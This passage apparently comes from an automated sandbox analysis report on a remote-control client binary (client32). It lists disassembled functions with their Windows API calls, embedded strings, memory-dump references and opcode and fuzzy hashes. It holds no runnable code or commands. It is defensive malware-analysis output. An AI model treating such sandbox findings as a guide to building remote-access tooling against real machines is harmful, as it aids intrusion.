                                                                                                                                                      • Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
                                                                                                                                                      • Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,1EF76653,?,00000000,00000001), ref: 110D7F8C
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    Strings
                                                                                                                                                    • NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
                                                                                                                                                    • NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
                                                                                                                                                    • NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C
                                                                                                                                                    • NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
                                                                                                                                                    • API String ID: 477284662-4139260718
                                                                                                                                                    • Opcode ID: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                                                                                    • Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
                                                                                                                                                    • Opcode Fuzzy Hash: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
                                                                                                                                                    • Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1
                                                                                                                                                    Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowA.USER32(NSMW16Class,00000000), ref: 1103D2E4
                                                                                                                                                    • SendMessageA.USER32(00000000,0000004A,000A0036,?), ref: 1103D313
                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1103D364
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFileFindHandleMessageSendWindowWrite
                                                                                                                                                    • String ID: CLTCONN.CPP$NSMW16Class
                                                                                                                                                    • API String ID: 4104200039-3790257117
                                                                                                                                                    • Opcode ID: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                                                                                                    • Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
                                                                                                                                                    • Opcode Fuzzy Hash: 7bae25e5ec6ac12795ee0301b5ed4f221613fcdb06e7094a7561e2cb570cb440
                                                                                                                                                    • Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91
                                                                                                                                                    Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                                                                                                    • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                                                                                    • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 490496107-2775872530
                                                                                                                                                    • Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                                                                                    • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                                                                                                    • Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
                                                                                                                                                    • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                                                                                                    Function 110416A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108librarythreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClassNameA.USER32(?,?,00000080), ref: 110416E7
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 11041719
                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749
                                                                                                                                                      • Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                                                                                      • Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                                                                      • Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000104), ref: 110417DD
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 110417EE
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
                                                                                                                                                    • String ID: NSSWControl32$pcinssui.exe$psapi.dll
                                                                                                                                                    • API String ID: 2388757878-1455766584
                                                                                                                                                    • Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                                                                                    • Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
                                                                                                                                                    • Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
                                                                                                                                                    • Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50
                                                                                                                                                    Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                                                                                                    • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                                                                                    • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 11023524
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                    • API String ID: 3823882759-1986719024
                                                                                                                                                    • Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                                                                                    • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                                                                                                    • Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
                                                                                                                                                    • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                                                                                                    Function 11147090 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                                                                                      • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                      • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                                                      • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                    • LoadLibraryA.KERNEL32(secur32.dll,1EF76653,?,?,?), ref: 111470D1
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                                                                                                    • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                                                                                                    • timeGetTime.WINMM(?,?), ref: 11147113
                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                                                                                                                    • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                                                                                                    • API String ID: 2282859717-3523682560
                                                                                                                                                    • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                                                    • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                                                                                                    • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                                                    • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                                                                                                    Function 110377F0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 11037872
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                                                                                                    • GetBkColor.GDI32(?), ref: 11037A5C
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                                                                                      • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                                                                                      • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                                                                                                    • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                                                                                                    • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 649858571-0
                                                                                                                                                    • Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                                                                                    • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                                                                                                    • Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
                                                                                                                                                    • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                                                                                                    Function 11025480 Relevance: 15.2, APIs: 10, Instructions: 207windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFocus.USER32(?), ref: 110254CE
                                                                                                                                                    • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                                                                                                    • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                                                                                                    • ShowCaret.USER32(00000000), ref: 11025515
                                                                                                                                                    • DestroyCaret.USER32 ref: 11025529
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Caret$CreateDestroyFocusItemShow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3189774202-0
